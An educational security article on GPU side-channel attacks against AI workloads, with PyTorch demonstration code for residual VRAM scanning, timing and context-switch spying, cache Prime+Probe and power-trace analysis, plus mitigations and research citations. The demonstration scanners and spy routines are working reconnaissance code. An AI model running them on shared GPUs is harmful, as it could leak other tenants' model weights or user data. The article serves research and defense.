GPU Memory Side-Channel Attacks
Side-channel attacks exploiting GPU memory allocation, timing, and electromagnetic emanation to extract sensitive data from AI workloads.
Overview
GPUs were designed for parallel computation, not for multi-tenant security isolation. Unlike CPUs, which have decades of refinement in memory protection (virtual memory, page tables, protection rings), GPU memory management is fundamentally simpler. NVIDIA GPUs use a unified VRAM pool that is managed by the CUDA driver, and the isolation guarantees depend on the sharing mode (exclusive, time-sliced, MPS, or MIG).
This creates side-channel opportunities that do not exist on CPUs. When GPU memory is freed, its contents persist in VRAM until overwritten by a later allocation. When multiple workloads share a GPU, timing differences in memory operations leak information about other workloads. Even physical side channels — power consumption and electromagnetic emanation — carry information about the computations being performed on the GPU.
These side channels are directly relevant to AI security because AI workloads process sensitive data: model weights (intellectual property), inference inputs (user data, business queries), and training data (which may include PII, medical records, or financial data). This article covers the known GPU side-channel attack classes, provides practical demonstration code, and evaluates the effectiveness of available mitigations.
The attacks described here draw on research including Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018), and Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).
GPU Memory Architecture
VRAM Management
NVIDIA GPUs manage VRAM through the CUDA driver, which allocates memory in blocks. Unlike CPU virtual memory, GPU memory allocation does not zero-initialize by default in all contexts. The CUDA runtime's cudaMalloc does not guarantee that allocated memory is cleared, meaning newly allocated buffers may contain data from previous allocations.
```python
import torch
from typing import Dict, List


class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.

    Demonstrates the GPU memory residual side channel.
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")

    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.

        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(
                    num_elements, dtype=torch.float32, device=self.device
                )
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
                del tensor
                torch.cuda.empty_cache()
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
        return findings

    def scan_for_model_weights(self, size_mb: int = 512) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.

        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            del tensor
            torch.cuda.empty_cache()
            return {"found": False, "detail": "No residual data"}
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
        looks_like_weights = (
            abs(mean) < 0.5             # Weights are typically near zero
            and 0.001 < std < 1.0       # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
        del tensor
        torch.cuda.empty_cache()
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }
```

Memory Allocation Timing
The time taken to allocate GPU memory depends on the current memory state, which is influenced by other workloads. By measuring allocation timing, an attacker can infer information about co-resident workloads:
```python
import time
from typing import Dict, List, Optional, Tuple

import torch


class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.

    Allocation and computation timing varies based on co-resident workloads.
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)

    def measure_allocation_timing(
        self,
        sizes_mb: Optional[List[int]] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.

        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
                try:
                    t = torch.empty(
                        num_elements, dtype=torch.float32, device=self.device
                    )
                    torch.cuda.synchronize()
                    timings.append(time.perf_counter_ns() - start)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
            if timings:
                mean_ns = sum(timings) / len(timings)
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": mean_ns,
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - mean_ns) ** 2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
        return results

    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.

        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
        for input_size in input_sizes:
            timings = []
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                timings.append(time.perf_counter_ns() - start)
                del x
            mean_ns = sum(timings) / len(timings)
            results.append({
                "input_size": input_size,
                "mean_us": mean_ns / 1000,
                "std_us": (
                    sum((t - mean_ns) ** 2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
        return results
```

Context-Switching Side Channels
Time-Sliced GPU Sharing
When multiple processes share a GPU via time-slicing (the default on consumer GPUs and many cloud instances), the GPU switches context between processes. Each context switch causes measurable performance interference.
Wei et al. demonstrated in "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) that by running a spy process that monitors its own performance during context switches, an attacker can infer:
- Whether a neural network is running on the shared GPU
- The model architecture (number of layers, layer types)
- The input data properties (image dimensions, batch size)
```python
import time
from typing import Dict, List

import torch


class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.

    Based on concepts from Wei et al. (IEEE DSN 2020).
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)

    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> Dict:
        """
        Run a continuous probe kernel and measure timing variations.

        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
            op_end = time.perf_counter_ns()
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": op_end - op_start,
            })
            del result
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Context switch causes >2x slowdown
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": (
                len(context_switches) / len(measurements) if measurements else 0
            ),
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }

    def infer_layer_structure(self, measurements: List[Dict]) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.

        Different layer types (conv, attention, linear) have characteristic
        timing signatures.
        """
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
        # Find timing anomalies that may correspond to layer executions
        anomalies = [i for i, d in enumerate(durations) if d > mean_d * 1.5]
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i + 1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval) ** 2 for i in intervals) / len(intervals)
            ) ** 0.5
            periodic = (
                interval_std / mean_interval < 0.3 if mean_interval > 0 else False
            )
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
        return {"inference_possible": False, "reason": "No clear pattern"}
```

Cache-Based Side Channels
GPU Cache Contention
Modern GPUs have per-SM L1 caches and a shared L2 cache. In shared GPU environments, cache contention between workloads creates observable timing differences:
```python
import time
from typing import Dict

import torch


class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.

    Cache contention from co-resident workloads causes measurable timing
    variations.
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)

    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of the Prime+Probe cache side channel.

        1. Prime: fill the GPU cache with known data
        2. Wait: allow the victim to execute (displacing some cache lines)
        3. Probe: measure access time to our cached data

        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
        baseline_times = []
        probe_times = []
        for _ in range(num_rounds):
            # PRIME: access all elements to fill the cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_times.append(time.perf_counter_ns() - start)
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_times.append(time.perf_counter_ns() - start)
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": (
                mean_probe / mean_baseline if mean_baseline > 0 else 0
            ),
        }
```

Power and Electromagnetic Side Channels
GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:
- Whether the GPU is performing matrix multiplication (training/inference) vs. memory operations
- The size of the matrices being computed
- Potentially, the values being processed (in extreme cases with high-resolution measurements)
These attacks require physical access to power measurement points or electromagnetic probes near the GPU, making them relevant primarily for:
- Shared physical infrastructure (colocation data centers)
- Edge AI devices where an attacker has physical access
- Supply chain attacks where monitoring hardware is implanted
```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float


class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.

    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """

    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
        # Detect computation phases
        mean_power = sum(powers) / len(powers)
        phases = []
        current_phase = "idle" if powers[0] < mean_power else "active"
        phase_start = 0
        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i
        active_phases = [p for p in phases if p["type"] == "active"]
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }

    def detect_model_architecture_from_power(self, phases: List[Dict]) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.

        Different layer types have characteristic power signatures:
        - Attention/matmul layers: high power, longer duration
        - Linear layers: moderate power, shorter duration
        - Normalization: low power, very short duration
        """
        if len(phases) < 3:
            return {"inference_possible": False}
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }
```

Mitigations
Software Mitigations
```python
import random
import time

import torch


class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""

    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        return torch.zeros(size, dtype=dtype, device=torch.device(device))

    @staticmethod
    def secure_deallocate(tensor: torch.Tensor) -> None:
        """Securely deallocate a tensor by overwriting with zeros before freeing."""
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        # Note: the caller must also drop its own references for the
        # memory to actually be released back to the allocator.
        del tensor
        torch.cuda.empty_cache()

    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.

        Makes timing side channels less reliable.
        """
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)

    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.

        Prevents timing side channels by making all inferences take the same
        time, provided the real inference stays under the fixed budget.
        """
        start = time.perf_counter()
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
        return output
```

Hardware Mitigations
| Mitigation | Effectiveness | Performance Impact | Availability |
|---|---|---|---|
| MIG (Multi-Instance GPU) | High — hardware isolation | Reduces per-instance compute | A100, H100 |
| NVIDIA Confidential Computing | Very High — encrypted GPU memory | 5-15% overhead | H100 |
| GPU Memory Scrubbing | Medium — removes residuals | Adds allocation latency | Software-configurable |
| Separate GPU per workload | Complete — no sharing | Expensive | Any GPU |
| IOMMU | Medium — prevents DMA attacks | Minimal | CPU/chipset dependent |
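The trade-offs in this table can be encoded as a simple decision aid. The sketch below is illustrative only (the `Deployment` type and `recommend_isolation` function are hypothetical, not an NVIDIA API); it returns candidate mitigations from the table, strongest first, given basic deployment facts:

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Deployment:
    multi_tenant: bool
    gpu_model: str        # e.g. "H100", "A100", "L4"
    sensitive_data: bool


def recommend_isolation(d: Deployment) -> List[str]:
    """Suggest hardware mitigations from the table above, strongest first."""
    recs = []
    if not d.multi_tenant:
        # No sharing means no cross-tenant side channel to attack
        recs.append("dedicated GPU per workload (no sharing)")
        return recs
    if d.gpu_model == "H100" and d.sensitive_data:
        recs.append("NVIDIA Confidential Computing (encrypted GPU memory)")
    if d.gpu_model in ("A100", "H100"):
        recs.append("MIG partitioning (hardware-isolated memory and compute)")
    recs.append("GPU memory scrubbing plus zero-on-allocate")
    recs.append("enable IOMMU to block DMA from other devices")
    return recs
```

For example, a multi-tenant A100 deployment yields MIG as the top recommendation, while a single-tenant box short-circuits to a dedicated GPU.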
Defensive Recommendations
- Use MIG for multi-tenant GPU environments to achieve hardware-enforced memory isolation
- Zero-initialize GPU memory on allocation to prevent residual data leakage
- Zero-fill GPU memory before freeing sensitive tensors
- Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
- Avoid GPU time-slicing for security-sensitive workloads — use dedicated GPUs or MIG instances
- Add timing noise to inference operations to defeat timing side channels
- Monitor GPU power consumption for anomalous patterns that may indicate side-channel attacks
- Enable IOMMU to prevent DMA-based memory access from compromised GPU workloads
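The power-monitoring recommendation can be approximated with a simple z-score detector over sampled power readings (e.g. from NVML). This is a minimal sketch; the function name and threshold are illustrative, and real deployments would feed it a rolling window of samples:

```python
from statistics import mean, stdev
from typing import List


def flag_power_anomalies(
    samples_watts: List[float],
    z_threshold: float = 3.0,
) -> List[int]:
    """Return indices of power samples deviating more than z_threshold
    standard deviations from the trace mean."""
    if len(samples_watts) < 2:
        return []
    mu = mean(samples_watts)
    sigma = stdev(samples_watts)
    if sigma == 0:
        return []  # perfectly flat trace, nothing to flag
    return [
        i for i, w in enumerate(samples_watts)
        if abs(w - mu) / sigma > z_threshold
    ]
```

A sustained run of flagged indices, rather than a lone spike, is the more interesting signal: repeated probing workloads tend to produce periodic excursions.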
References
- Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
- Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
- Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
- NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
- NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
- MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)